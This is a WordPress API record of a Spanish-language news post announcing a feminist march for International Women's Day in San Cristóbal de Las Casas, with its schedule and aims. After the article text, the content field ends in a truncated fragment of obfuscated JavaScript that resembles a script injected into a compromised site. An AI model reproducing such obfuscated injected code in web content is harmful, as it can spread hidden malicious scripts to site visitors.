{"id":20783,"date":"2025-03-07T05:42:29","date_gmt":"2025-03-07T05:42:29","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20783"},"modified":"2025-03-07T05:42:30","modified_gmt":"2025-03-07T05:42:30","slug":"convocan-a-marcha-feminista-por-el-dia-internacional-de-la-mujer","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20783","title":{"rendered":"Convocan a marcha feminista por el D\u00eda Internacional de la Mujer"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"770\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/97fafcb8-b7e7-48e7-93f2-27f44bc7f75b-1024x770.jpg\" alt=\"\" class=\"wp-image-20784\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/97fafcb8-b7e7-48e7-93f2-27f44bc7f75b-1024x770.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/97fafcb8-b7e7-48e7-93f2-27f44bc7f75b-300x226.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/97fafcb8-b7e7-48e7-93f2-27f44bc7f75b-768x578.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/97fafcb8-b7e7-48e7-93f2-27f44bc7f75b.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ Corresponsal<\/p>\n\n\n\n<p>6 de marzo del 2025. San Crist\u00f3bal de Las Casas.- Diversos colectivos feministas han organizado una movilizaci\u00f3n el pr\u00f3ximo s\u00e1bado 8 de marzo en esta ciudad con motivo del D\u00eda Internacional de la Mujer. El prop\u00f3sito principal de la protesta es exigir justicia ante los feminicidios y visibilizar la violencia de g\u00e9nero en sus distintas manifestaciones, como la violencia laboral, f\u00edsica, psicol\u00f3gica y sexual.<\/p>\n\n\n\n<p>Las actividades comenzar\u00e1n a las 9:00 de la ma\u00f1ana en la Plaza Catedral, donde se llevar\u00e1n a cabo acciones de concientizaci\u00f3n y eventos culturales. Entre ellos, se incluyen perifoneo, presentaciones musicales y po\u00e9ticas, proyecci\u00f3n de videos, venta de libros y una exhibici\u00f3n de im\u00e1genes de mujeres desaparecidas en M\u00e9xico y Chiapas.<\/p>\n\n\n\n<p>Asimismo, se contar\u00e1 con la presencia de madres buscadoras, quienes contin\u00faan en la lucha por la verdad y justicia para sus hijas e hijos desaparecidos o asesinados.<\/p>\n\n\n\n<p>La marcha iniciar\u00e1 a las 3:00 de la tarde desde la Plaza Catedral y recorrer\u00e1 diversas calles del centro hist\u00f3rico, para luego regresar al punto de partida aproximadamente una hora despu\u00e9s. Ah\u00ed, se llevar\u00e1 a cabo un mitin en el que se leer\u00e1 un pronunciamiento con las principales exigencias y preocupaciones de los manifestantes.<\/p>\n\n\n\n<p>Las organizadoras han hecho un llamado a otros colectivos y a la ciudadan\u00eda en general para unirse a la movilizaci\u00f3n, resaltando la importancia de la uni\u00f3n en la lucha contra la violencia de g\u00e9nero. Adem\u00e1s, informaron que un grupo de mujeres vestidas de negro se encargar\u00e1 de la log\u00edstica del evento para garantizar el orden durante la jornada.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ Corresponsal 6 de marzo del 2025. San Crist\u00f3bal de Las Casas.- Diversos colectivos feministas han organizado una movilizaci\u00f3n el pr\u00f3ximo s\u00e1bado 8 de marzo en esta ciudad con motivo del D\u00eda Internacional de la Mujer. El prop\u00f3sito principal de la protesta es exigir justicia ante los feminicidios y visibilizar la violencia de g\u00e9nero &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20784,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-20783","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20783","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20783"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20783\/revisions"}],"predecessor-version":[{"id":20785,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20783\/revisions\/20785"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20784"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20783"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20783"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20783"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}